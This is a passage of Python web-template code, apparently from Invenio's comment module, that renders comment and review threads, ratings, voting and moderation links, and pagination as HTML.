body=comment[c_body], status='', nb_reports=0,
report_link=report_link, reply_link=reply_link, recID=recID)
comment_rows += """
<br />
<br />
</td>
</tr>"""
# Close comment round
comment_rows += '</div>'
# write button
write_button_label = _("Write a comment")
write_button_link = '%s/record/%s/comments/add' % (CFG_SITE_URL, recID)
write_button_form = '<input type="hidden" name="ln" value="%s"/>' % ln
write_button_form = self.createhiddenform(action=write_button_link, method="get", text=write_button_form, button=write_button_label)
# output
if nb_comments_total > 0:
out = warnings
comments_label = len(comments) > 1 and _("Showing the latest %i comments:") % len(comments) \
or ""
out += """
<table>
<tr>
<td class="blocknote">%(comment_title)s</td>
</tr>
</table>
%(comments_label)s<br />
<table border="0" cellspacing="5" cellpadding="5" width="100%%">
%(comment_rows)s
</table>
%(view_all_comments_link)s
<br />
<br />
%(write_button_form)s<br />""" % \
{'comment_title': _("Discuss this document"),
'comments_label': comments_label,
'nb_comments_total' : nb_comments_total,
'recID': recID,
'comment_rows': comment_rows,
'tab': ' '*4,
'siteurl': CFG_SITE_URL,
's': nb_comments_total>1 and 's' or "",
'view_all_comments_link': nb_comments_total>0 and '''<a href="%s/record/%s/comments/display">View all %s comments</a>''' \
% (CFG_SITE_URL, recID, nb_comments_total) or "",
'write_button_form': write_button_form,
'nb_comments': len(comments)
}
else:
out = """
<!-- comments title table -->
<table>
<tr>
<td class="blocknote">%(discuss_label)s:</td>
</tr>
</table>
%(detailed_info)s
<br />
%(form)s
<br />""" % {'form': write_button_form,
'discuss_label': _("Discuss this document"),
'detailed_info': _("Start a discussion about any aspect of this document.")
}
return out
def tmpl_record_not_found(self, status='missing', recID="", ln=CFG_SITE_LANG):
"""
Displays a page when bad or missing record ID was given.
@param status: 'missing' : no recID was given
'inexistant': recID doesn't have an entry in the database
'nan' : recID is not a number
'invalid' : recID is an error code, i.e. in the interval [-99,-1]
@param return: body of the page
"""
_ = gettext_set_language(ln)
if status == 'inexistant':
body = _("Sorry, the record %s does not seem to exist.") % (recID,)
elif status in ('nan', 'invalid'):
body = _("Sorry, %s is not a valid ID value.") % (recID,)
else:
body = _("Sorry, no record ID was provided.")
body += "<br /><br />"
link = "<a href=\"%s?ln=%s\">%s</a>." % (CFG_SITE_URL, ln, CFG_SITE_NAME_INTL.get(ln, CFG_SITE_NAME))
body += _("You may want to start browsing from %s") % link
return body
def tmpl_get_first_comments_with_ranking(self, recID, ln, comments=None, nb_comments_total=None, avg_score=None, warnings=[]):
"""
@param recID: record id
@param ln: language
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param nb_comments_total: total number of comments for this record
@param avg_score: average score of all reviews
@param warnings: list of warning tuples (warning_msg, arg1, arg2, ...)
@return: html of comments
"""
# load the right message language
_ = gettext_set_language(ln)
# naming data fields of comments
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_nb_votes_yes = 4
c_nb_votes_total = 5
c_star_score = 6
c_title = 7
c_id = 8
warnings = self.tmpl_warnings(warnings, ln)
#stars
if avg_score > 0:
avg_score_img = 'stars-' + str(avg_score).split('.')[0] + '-' + str(avg_score).split('.')[1] + '.png'
else:
avg_score_img = "stars-0-0.png"
# voting links
useful_dict = { 'siteurl' : CFG_SITE_URL,
'recID' : recID,
'ln' : ln,
'yes_img' : 'smchk_gr.gif', #'yes.gif',
'no_img' : 'iconcross.gif' #'no.gif'
}
link = '<a href="%(siteurl)s/record/%(recID)s/reviews/vote?ln=%(ln)s&comid=%%(comid)s' % useful_dict
useful_yes = link + '&com_value=1">' + _("Yes") + '</a>'
useful_no = link + '&com_value=-1">' + _("No") + '</a>'
#comment row
comment_rows = ' '
max_comment_round_name = comments[-1][0]
for comment_round_name, comments_list in comments:
comment_rows += '<div id="cmtRound%i" class="cmtRound">' % (comment_round_name)
comment_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "<br/>"
for comment in comments_list:
if comment[c_nickname]:
nickname = comment[c_nickname]
display = nickname
else:
(uid, nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(nickname, display, ln)
comment_rows += '''
<tr>
<td>'''
report_link = '%s/record/%s/reviews/report?ln=%s&comid=%s' % (CFG_SITE_URL, recID, ln, comment[c_id])
comment_rows += self.tmpl_get_comment_with_ranking(None, ln=ln, nickname=messaging_link,
comment_uid=comment[c_user_id],
date_creation=comment[c_date_creation],
body=comment[c_body],
status='', nb_reports=0,
nb_votes_total=comment[c_nb_votes_total],
nb_votes_yes=comment[c_nb_votes_yes],
star_score=comment[c_star_score],
title=comment[c_title], report_link=report_link, recID=recID)
comment_rows += '''
%s %s / %s<br />''' % (_("Was this review helpful?"), useful_yes % {'comid':comment[c_id]}, useful_no % {'comid':comment[c_id]})
comment_rows += '''
<br />
</td>
</tr>'''
# Close comment round
comment_rows += '</div>'
# write button
write_button_link = '''%s/record/%s/reviews/add''' % (CFG_SITE_URL, recID)
write_button_form = ' <input type="hidden" name="ln" value="%s"/>' % ln
write_button_form = self.createhiddenform(action=write_button_link, method="get", text=write_button_form, button=_("Write a review"))
if nb_comments_total > 0:
avg_score_img = str(avg_score_img)
avg_score = str(avg_score)
nb_comments_total = str(nb_comments_total)
score = '<b>'
score += _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '</b><img src="' + CFG_SITE_URL + '/img/' + avg_score_img + '" alt="' + avg_score + '" />',
'x_nb_reviews': nb_comments_total}
useful_label = _("Readers found the following %s reviews to be most helpful.")
useful_label %= len(comments) > 1 and len(comments) or ""
view_all_comments_link ='<a href="%s/record/%s/reviews/display?ln=%s&do=hh">' % (CFG_SITE_URL, recID, ln)
view_all_comments_link += _("View all %s reviews") % nb_comments_total
view_all_comments_link += '</a><br />'
out = warnings + """
<!-- review title table -->
<table>
<tr>
<td class="blocknote">%(comment_title)s:</td>
</tr>
</table>
%(score_label)s<br />
%(useful_label)s
<!-- review table -->
<table style="border: 0px; border-collapse: separate; border-spacing: 5px; padding: 5px; width: 100%%">
%(comment_rows)s
</table>
%(view_all_comments_link)s
%(write_button_form)s<br />
""" % \
{ 'comment_title' : _("Rate this document"),
'score_label' : score,
'useful_label' : useful_label,
'recID' : recID,
'view_all_comments' : _("View all %s reviews") % (nb_comments_total,),
'write_comment' : _("Write a review"),
'comment_rows' : comment_rows,
'tab' : ' '*4,
'siteurl' : CFG_SITE_URL,
'view_all_comments_link': nb_comments_total>0 and view_all_comments_link or "",
'write_button_form' : write_button_form
}
else:
out = '''
<!-- review title table -->
<table>
<tr>
<td class="blocknote">%s:</td>
</tr>
</table>
%s<br />
%s
<br />''' % (_("Rate this document"),
_("Be the first to review this document."),
write_button_form)
return out
def tmpl_get_comment_without_ranking(self, req, ln, nickname, comment_uid, date_creation, body, status, nb_reports, reply_link=None, report_link=None, undelete_link=None, delete_links=None, unreport_link=None, recID=-1, com_id='', attached_files=None):
"""
private function
@param req: request object to fetch user info
@param ln: language
@param nickname: nickname
@param date_creation: date comment was written
@param body: comment body
@param status: status of the comment:
da: deleted by author
dm: deleted by moderator
ok: active
@param nb_reports: number of reports the comment has
@param reply_link: if want reply and report, give the http links
@param report_link: if want reply and report, give the http links
@param undelete_link: http link to delete the message
@param delete_links: http links to delete the message
@param unreport_link: http link to unreport the comment
@param recID: recID where the comment is posted
@param com_id: ID of the comment displayed
@param attached_files: list of attached files
@return: html table of comment
"""
from invenio.search_engine import guess_primary_collection_of_a_record
# load the right message language
_ = gettext_set_language(ln)
date_creation = convert_datetext_to_dategui(date_creation, ln=ln)
if attached_files is None:
attached_files = []
out = ''
final_body = email_quoted_txt2html(body)
title = _('%(x_name)s wrote on %(x_date)s:') % {'x_name': nickname,
'x_date': '<i>' + date_creation + '</i>'}
title += '<a name=%s></a>' % com_id
links = ''
moderator_links = ''
if reply_link:
links += '<a href="' + reply_link +'">' + _("Reply") +'</a>'
if report_link and status != 'ap':
links += ' | '
if report_link and status != 'ap':
links += '<a href="' + report_link +'">' + _("Report abuse") + '</a>'
# Check if user is a comment moderator
record_primary_collection = guess_primary_collection_of_a_record(recID)
user_info = collect_user_info(req)
(auth_code, auth_msg) = acc_authorize_action(user_info, 'moderatecomments', collection=record_primary_collection)
if status in ['dm', 'da'] and req:
if not auth_code:
if status == 'dm':
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment deleted by the moderator) - not visible for users<br /><br />' +\
final_body + '</div>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment deleted by the author) - not visible for users<br /><br />' +\
final_body + '</div>'
links = ''
moderator_links += '<a style="color:#8B0000;" href="' + undelete_link + '">' + _("Undelete comment") + '</a>'
else:
if status == 'dm':
final_body = '<div style="color:#a3a3a3;font-style:italic;">Comment deleted by the moderator</div>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">Comment deleted by the author</div>'
links = ''
else:
if not auth_code:
moderator_links += '<a style="color:#8B0000;" href="' + delete_links['mod'] +'">' + _("Delete comment") + '</a>'
elif (user_info['uid'] == comment_uid) and CFG_WEBCOMMENT_AUTHOR_DELETE_COMMENT_OPTION:
moderator_links += '<a style="color:#8B0000;" href="' + delete_links['auth'] +'">' + _("Delete comment") + '</a>'
if nb_reports >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN:
if not auth_code:
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment reported. Pending approval) - not visible for users<br /><br />' + final_body + '</div>'
links = ''
moderator_links += ' | '
moderator_links += '<a style="color:#8B0000;" href="' + unreport_link +'">' + _("Unreport comment") + '</a>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">This comment is pending approval due to user reports</div>'
links = ''
if links and moderator_links:
links = links + ' || ' + moderator_links
elif not links:
links = moderator_links
attached_files_html = ''
if attached_files:
attached_files_html = '<div class="cmtfilesblock"><b>%s:</b><br/>' % (len(attached_files) == 1 and _("Attached file") or _("Attached files"))
for (filename, filepath, fileurl) in attached_files:
attached_files_html += create_html_link(urlbase=fileurl, urlargd={},
link_label=cgi.escape(filename)) + '<br />'
attached_files_html += '</div>'
out += """
<div style="margin-bottom:20px;background:#F9F9F9;border:1px solid #DDD">%(title)s<br />
<blockquote>
%(body)s
</blockquote>
<br />
%(attached_files_html)s
<div style="float:right">%(links)s</div>
</div>""" % \
{'title' : '<div style="background-color:#EEE;padding:2px;"><img src="%s/img/user-icon-1-24x24.gif" alt="" /> %s</div>' % (CFG_SITE_URL, title),
'body' : final_body,
'links' : links,
'attached_files_html': attached_files_html}
return out
def tmpl_get_comment_with_ranking(self, req, ln, nickname, comment_uid, date_creation, body, status, nb_reports, nb_votes_total, nb_votes_yes, star_score, title, report_link=None, delete_links=None, undelete_link=None, unreport_link=None, recID=-1):
"""
private function
@param req: request object to fetch user info
@param ln: language
@param nickname: nickname
@param date_creation: date comment was written
@param body: comment body
@param status: status of the comment
@param nb_reports: number of reports the comment has
@param nb_votes_total: total number of votes for this review
@param nb_votes_yes: number of positive votes for this record
@param star_score: star score for this record
@param title: title of review
@param report_link: if want reply and report, give the http links
@param undelete_link: http link to delete the message
@param delete_link: http link to delete the message
@param unreport_link: http link to unreport the comment
@param recID: recID where the comment is posted
@return: html table of review
"""
from invenio.search_engine import guess_primary_collection_of_a_record
# load the right message language
_ = gettext_set_language(ln)
if star_score > 0:
star_score_img = 'stars-' + str(star_score) + '-0.png'
else:
star_score_img = 'stars-0-0.png'
out = ""
date_creation = convert_datetext_to_dategui(date_creation, ln=ln)
reviewed_label = _("Reviewed by %(x_nickname)s on %(x_date)s") % {'x_nickname': nickname, 'x_date':date_creation}
useful_label = _("%(x_nb_people)i out of %(x_nb_total)i people found this review useful") % {'x_nb_people': nb_votes_yes,
'x_nb_total': nb_votes_total}
links = ''
_body = ''
if body != '':
_body = '''
<blockquote>
%s
</blockquote>''' % email_quoted_txt2html(body, linebreak_html='')
# Check if user is a comment moderator
record_primary_collection = guess_primary_collection_of_a_record(recID)
user_info = collect_user_info(req)
(auth_code, auth_msg) = acc_authorize_action(user_info, 'moderatecomments', collection=record_primary_collection)
if status in ['dm', 'da'] and req:
if not auth_code:
if status == 'dm':
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review deleted by moderator) - not visible for users<br /><br />' +\
_body + '</div>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review deleted by author) - not visible for users<br /><br />' +\
_body + '</div>'
links = '<a style="color:#8B0000;" href="' + undelete_link + '">' + _("Undelete review") + '</a>'
else:
if status == 'dm':
_body = '<div style="color:#a3a3a3;font-style:italic;">Review deleted by moderator</div>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">Review deleted by author</div>'
links = ''
else:
if not auth_code:
links += '<a style="color:#8B0000;" href="' + delete_links['mod'] +'">' + _("Delete review") + '</a>'
if nb_reports >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN:
if not auth_code:
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review reported. Pending approval) - not visible for users<br /><br />' + _body + '</div>'
links += ' | '
links += '<a style="color:#8B0000;" href="' + unreport_link +'">' + _("Unreport review") + '</a>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">This review is pending approval due to user reports.</div>'
links = ''
out += '''
<div style="background:#F9F9F9;border:1px solid #DDD">
<div style="background-color:#EEE;padding:2px;">
<img src="%(siteurl)s/img/%(star_score_img)s" alt="%(star_score)s" style="margin-right:10px;"/><b>%(title)s</b><br />
%(reviewed_label)s<br />
%(useful_label)s
</div>
%(body)s
</div>
%(abuse)s''' % {'siteurl' : CFG_SITE_URL,
'star_score_img': star_score_img,
'star_score' : star_score,
'title' : title,
'reviewed_label': reviewed_label,
'useful_label' : useful_label,
'body' : _body,
'abuse' : links
}
return out
def tmpl_get_comments(self, req, recID, ln,
nb_per_page, page, nb_pages,
display_order, display_since,
CFG_WEBCOMMENT_ALLOW_REVIEWS,
comments, total_nb_comments,
avg_score,
warnings,
border=0, reviews=0,
total_nb_reviews=0,
nickname='', uid=-1, note='',score=5,
can_send_comments=False,
can_attach_files=False,
user_is_subscribed_to_discussion=False,
user_can_unsubscribe_from_discussion=False,
display_comment_rounds=None):
"""
Get table of all comments
@param recID: record id
@param ln: language
@param nb_per_page: number of results per page
@param page: page number
@param display_order: hh = highest helpful score, review only
lh = lowest helpful score, review only
hs = highest star score, review only
ls = lowest star score, review only
od = oldest date
nd = newest date
@param display_since: all= no filtering by date
nd = n days ago
nw = n weeks ago
nm = n months ago
ny = n years ago
where n is a single digit integer between 0 and 9
@param CFG_WEBCOMMENT_ALLOW_REVIEWS: is ranking enable, get from config.py/CFG_WEBCOMMENT_ALLOW_REVIEWS
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param total_nb_comments: total number of comments for this record
@param avg_score: average score of reviews for this record
@param warnings: list of warning tuples (warning_msg, color)
@param border: boolean, active if want to show border around each comment/review
@param reviews: boolean, enabled for reviews, disabled for comments
@param can_send_comments: boolean, if user can send comments or not
@param can_attach_files: boolean, if user can attach file to comment or not
@param user_is_subscribed_to_discussion: True if user already receives new comments by email
@param user_can_unsubscribe_from_discussion: True is user is allowed to unsubscribe from discussion
"""
# load the right message language
_ = gettext_set_language(ln)
# CERN hack begins: display full ATLAS user name. Check further below too.
current_user_fullname = ""
override_nickname_p = False
if CFG_CERN_SITE:
from invenio.search_engine import get_all_collections_of_a_record
user_info = collect_user_info(uid)
if 'atlas-readaccess-current-physicists [CERN]' in user_info['group']:
# An ATLAS member is never anonymous to its colleagues
# when commenting inside ATLAS collections
recid_collections = get_all_collections_of_a_record(recID)
if 'ATLAS' in str(recid_collections):
override_nickname_p = True
current_user_fullname = user_info.get('external_fullname', '')
# CERN hack ends
# naming data fields of comments
if reviews:
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_status = 4
c_nb_reports = 5
c_nb_votes_yes = 6
c_nb_votes_total = 7
c_star_score = 8
c_title = 9
c_id = 10
c_round_name = 11
c_restriction = 12
reply_to = 13
discussion = 'reviews'
comments_link = '<a href="%s/record/%s/comments/">%s</a> (%i)' % (CFG_SITE_URL, recID, _('Comments'), total_nb_comments)
reviews_link = '<b>%s (%i)</b>' % (_('Reviews'), total_nb_reviews)
add_comment_or_review = self.tmpl_add_comment_form_with_ranking(recID, uid, current_user_fullname or nickname, ln, '', score, note, warnings, show_title_p=True, can_attach_files=can_attach_files)
else:
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_status = 4
c_nb_reports = 5
c_id = 6
c_round_name = 7
c_restriction = 8
reply_to = 9
discussion = 'comments'
comments_link = '<b>%s (%i)</b>' % (_('Comments'), total_nb_comments)
reviews_link = '<a href="%s/record/%s/reviews/">%s</a> (%i)' % (CFG_SITE_URL, recID, _('Reviews'), total_nb_reviews)
add_comment_or_review = self.tmpl_add_comment_form(recID, uid, nickname, ln, note, warnings, can_attach_files=can_attach_files, user_is_subscribed_to_discussion=user_is_subscribed_to_discussion)
# voting links
useful_dict = { 'siteurl' : CFG_SITE_URL,
'recID' : recID,
'ln' : ln,
'do' : display_order,
'ds' : display_since,
'nb' : nb_per_page,
'p' : page,
'reviews' : reviews,
'discussion' : discussion
}
useful_yes = '<a href="%(siteurl)s/record/%(recID)s/%(discussion)s/vote?ln=%(ln)s&comid=%%(comid)s&com_value=1&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/%(discussion)s/display">' + _("Yes") + '</a>'
useful_yes %= useful_dict
useful_no = '<a href="%(siteurl)s/record/%(recID)s/%(discussion)s/vote?ln=%(ln)s&comid=%%(comid)s&com_value=-1&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/%(discussion)s/display">' + _("No") + '</a>'
useful_no %= useful_dict
warnings = self.tmpl_warnings(warnings, ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'index',
'discussion': discussion,
'arguments' : 'do=%s&ds=%s&nb=%s' % (display_order, display_since, nb_per_page),
'arg_page' : '&p=%s' % page,
'page' : page,
'rec_id' : recID}
if not req:
req = None
## comments table
comments_rows = ''
last_comment_round_name = None
comment_round_names = [comment[0] for comment in comments]
if comment_round_names:
last_comment_round_name = comment_round_names[-1]
for comment_round_name, comments_list in comments:
comment_round_style = "display:none;"
comment_round_is_open = False
if comment_round_name in display_comment_rounds:
comment_round_is_open = True
comment_round_style = ""
comments_rows += '<div id="cmtRound%s" class="cmtround">' % (comment_round_name)
if not comment_round_is_open and \
(comment_round_name or len(comment_round_names) > 1):
new_cmtgrp = list(display_comment_rounds)
new_cmtgrp.append(comment_round_name)
comments_rows += '''<img src="/img/right-trans.gif" id="cmtarrowiconright%(grp_id)s" alt="Open group" /><img src="/img/down-trans.gif" id="cmtarrowicondown%(grp_id)s" alt="Close group" style="display:none" />
<a class="cmtgrpswitch" name="cmtgrpLink%(grp_id)s" onclick="var cmtarrowicondown=document.getElementById('cmtarrowicondown%(grp_id)s');var cmtarrowiconright=document.getElementById('cmtarrowiconright%(grp_id)s');var subgrp=document.getElementById('cmtSubRound%(grp_id)s');if (subgrp.style.display==''){subgrp.style.display='none';cmtarrowiconright.style.display='';cmtarrowicondown.style.display='none';}else{subgrp.style.display='';cmtarrowiconright.style.display='none';cmtarrowicondown.style.display='';};return false;"''' % {'grp_id': comment_round_name}
comments_rows += 'href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s' % link_dic
comments_rows += '&' + '&'.join(["cmtgrp=" + grp for grp in new_cmtgrp if grp != 'none']) + \
'#cmtgrpLink%s' % (comment_round_name) + '\">'
comments_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "</a><br/>"
elif comment_round_name or len(comment_round_names) > 1:
new_cmtgrp = list(display_comment_rounds)
new_cmtgrp.remove(comment_round_name)
comments_rows += '''<img src="/img/right-trans.gif" id="cmtarrowiconright%(grp_id)s" alt="Open group" style="display:none" /><img src="/img/down-trans.gif" id="cmtarrowicondown%(grp_id)s" alt="Close group" />
<a class="cmtgrpswitch" name="cmtgrpLink%(grp_id)s" onclick="var cmtarrowicondown=document.getElementById('cmtarrowicondown%(grp_id)s');var cmtarrowiconright=document.getElementById('cmtarrowiconright%(grp_id)s');var subgrp=document.getElementById('cmtSubRound%(grp_id)s');if (subgrp.style.display==''){subgrp.style.display='none';cmtarrowiconright.style.display='';cmtarrowicondown.style.display='none';}else{subgrp.style.display='';cmtarrowiconright.style.display='none';cmtarrowicondown.style.display='';};return false;"''' % {'grp_id': comment_round_name}
comments_rows += 'href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s' % link_dic
comments_rows += '&' + ('&'.join(["cmtgrp=" + grp for grp in new_cmtgrp if grp != 'none']) or 'cmtgrp=none' ) + \
'#cmtgrpLink%s' % (comment_round_name) + '\">'
comments_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name}+ "</a><br/>"
comments_rows += '<div id="cmtSubRound%s" class="cmtsubround" style="%s">' % (comment_round_name,
comment_round_style)
thread_history = [0]
for comment in comments_list:
if comment[reply_to] not in thread_history:
# Going one level down in the thread
thread_history.append(comment[reply_to])
depth = thread_history.index(comment[reply_to])
else:
depth = thread_history.index(comment[reply_to])
thread_history = thread_history[:depth + 1]
# CERN hack begins: display full ATLAS user name.
comment_user_fullname = ""
if CFG_CERN_SITE and override_nickname_p:
comment_user_fullname = get_email(comment[c_user_id])
# CERN hack ends
if comment[c_nickname]:
_nickname = comment[c_nickname]
display = _nickname
else:
(uid, _nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(_nickname, comment_user_fullname or display, ln)
from invenio.webcomment import get_attached_files # FIXME
files = get_attached_files(recID, comment[c_id])
# do NOT delete the HTML comment below. It is used for parsing... (I plead unguilty!)
comments_rows += """
<!-- start comment row -->
<div style="margin-left:%spx">""" % (depth*20)
delete_links = {}
if not reviews:
report_link = '%(siteurl)s/record/%(recID)s/comments/report?ln=%(ln)s&comid=%%(comid)s&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/comments/display' % useful_dict % {'comid':comment[c_id]}
reply_link = '%(siteurl)s/record/%(recID)s/comments/add?ln=%(ln)s&action=REPLY&comid=%%(comid)s' % useful_dict % {'comid':comment[c_id]}
delete_links['mod'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_mod?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
delete_links['auth'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_auth?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
undelete_link = "%s/admin/webcomment/webcommentadmin.py/undel_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
unreport_link = "%s/admin/webcomment/webcommentadmin.py/unreport_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
comments_rows += self.tmpl_get_comment_without_ranking(req, ln, messaging_link, comment[c_user_id], comment[c_date_creation], comment[c_body], comment[c_status], comment[c_nb_reports], reply_link, report_link, undelete_link, delete_links, unreport_link, recID, comment[c_id], files)
else:
report_link = '%(siteurl)s/record/%(recID)s/reviews/report?ln=%(ln)s&comid=%%(comid)s&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/reviews/display' % useful_dict % {'comid': comment[c_id]}
delete_links['mod'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_mod?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
delete_links['auth'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_auth?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
undelete_link = "%s/admin/webcomment/webcommentadmin.py/undel_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
unreport_link = "%s/admin/webcomment/webcommentadmin.py/unreport_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
comments_rows += self.tmpl_get_comment_with_ranking(req, ln, messaging_link, comment[c_user_id], comment[c_date_creation], comment[c_body], comment[c_status], comment[c_nb_reports], comment[c_nb_votes_total], comment[c_nb_votes_yes], comment[c_star_score], comment[c_title], report_link, delete_links, undelete_link, unreport_link, recID)
helpful_label = _("Was this review helpful?")
report_abuse_label = "(" + _("Report abuse") + ")"
yes_no_separator = '<td> / </td>'
if comment[c_nb_reports] >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN or comment[c_status] in ['dm', 'da']:
report_abuse_label = ""
helpful_label = ""
useful_yes = ""
useful_no = ""
yes_no_separator = ""
comments_rows += """
<table>
<tr>
<td>%(helpful_label)s %(tab)s</td>
<td> %(yes)s </td>
%(yes_no_separator)s
<td> %(no)s </td>
<td class="reportabuse">%(tab)s%(tab)s<a href="%(report)s">%(report_abuse_label)s</a></td>
</tr>
</table>""" \
% {'helpful_label': helpful_label,
'yes' : useful_yes % {'comid':comment[c_id]},
'yes_no_separator': yes_no_separator,
'no' : useful_no % {'comid':comment[c_id]},
'report' : report_link % {'comid':comment[c_id]},
'report_abuse_label': comment[c_nb_reports] >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN and '' or report_abuse_label,
'tab' : ' '*2}
# do NOT remove HTML comment below. It is used for parsing...
comments_rows += """
</div>
<!-- end comment row -->"""
comments_rows += '</div></div>'
## page links
page_links = ''
# Previous
if page != 1:
link_dic['arg_page'] = 'p=%s' % (page - 1)
page_links += '<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\"><<</a> ' % link_dic
else:
page_links += ' %s ' % (' '*(len(_('Previous'))+7))
# Page Numbers
for i in range(1, nb_pages+1):
link_dic['arg_page'] = 'p=%s' % i
link_dic['page'] = '%s' % i
if i != page:
page_links += '''
<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\">%(page)s</a> ''' % link_dic
else:
page_links += ''' <b>%s</b> ''' % i
# Next
if page != nb_pages:
link_dic['arg_page'] = 'p=%s' % (page + 1)
page_links += '''
<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\">>></a> ''' % link_dic
else:
page_links += '%s' % (' '*(len(_('Next'))+7))
## stuff for ranking if enabled
if reviews:
if avg_score > 0:
avg_score_img = 'stars-' + str(avg_score).split('.')[0] + '-' + str(avg_score).split('.')[1] + '.png'
else:
avg_score_img = "stars-0-0.png"
ranking_average = '<br /><b>'
ranking_average += _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '</b><img src="' + CFG_SITE_URL + '/img/' + avg_score_img + '" alt="' + str(avg_score) + '" />',
'x_nb_reviews': str(total_nb_reviews)}
ranking_average += '<br />'
else:
ranking_average = ""
write_button_link = '''%s/record/%s/%s/add''' % (CFG_SITE_URL, recID, discussion)
write_button_form = '<input type="hidden" name="ln" value="%s"/>'
write_button_form = self.createhiddenform(action=write_button_link,
method="get",
text=write_button_form,
button = reviews and _('Write a review') or _('Write a comment'))
if reviews:
total_label = _("There is a total of %s reviews")
else:
total_label = _("There is a total of %s comments")
total_label %= total_nb_comments
review_or_comment_first = ''
if reviews == 0 and total_nb_comments == 0 and can_send_comments:
review_or_comment_first = _("Start a discussion about any aspect of this document.") + '<br />'
elif reviews == 1 and total_nb_reviews == 0 and can_send_comments:
review_or_comment_first = _("Be the first to review this document.") + '<br />'
# do NOT remove the HTML comments below. Used for parsing
body = '''
%(comments_and_review_tabs)s
<!-- start comments table -->
<div style="border: %(border)spx solid black; width: 95%%; margin:10px;font-size:small">
%(comments_rows)s
</div>
<!-- end comments table -->
%(review_or_comment_first)s
<br />''' % \
{ 'record_label': _("Record"),
'back_label': _("Back to search results"),
'total_label': total_label,
'write_button_form' : write_button_form,
'write_button_form_again' : total_nb_comments>3 and write_button_form or "",
'comments_rows' : comments_rows,
'total_nb_comments' : total_nb_comments,
'comments_or_reviews' : reviews and _('review') or _('comment'),
'comments_or_reviews_title' : reviews and _('Review') or _('Comment'),
'siteurl' : CFG_SITE_URL,
'module' : "comments",
'recid' : recID,
'ln' : ln,
'border' : border,
'ranking_avg' : ranking_average,
'comments_and_review_tabs' : CFG_WEBCOMMENT_ALLOW_REVIEWS and \
CFG_WEBCOMMENT_ALLOW_COMMENTS and \
'%s | %s <br />' % \
(comments_link, reviews_link) or '',
'review_or_comment_first' : review_or_comment_first
}
# form is not currently used. reserved for an eventual purpose
#form = """
# Display <select name="nb" size="1"> per page
# <option value="all">All</option>
# <option value="10">10</option>
# <option value="25">20</option>
# <option value="50">50</option>
# <option value="100" selected="selected">100</option>
# </select>
# comments per page that are <select name="ds" size="1">
# <option value="all" selected="selected">Any age</option>
# <option value="1d">1 day old</option>
# <option value="3d">3 days old</option>
# <option value="1w">1 week old</option>
# <option value="2w">2 weeks old</option>
# <option value="1m">1 month old</option>
# <option value="3m">3 months old</option>
# <option value="6m">6 months old</option>
# <option value="1y">1 year old</option>
# </select>
# and sorted by <select name="do" size="1">
# <option value="od" selected="selected">Oldest first</option>
# <option value="nd">Newest first</option>
# %s
# </select>
# """ % \
# (reviews==1 and '''
# <option value=\"hh\">most helpful</option>
# <option value=\"lh\">least helpful</option>
# <option value=\"hs\">highest star ranking</option>
# <option value=\"ls\">lowest star ranking</option>
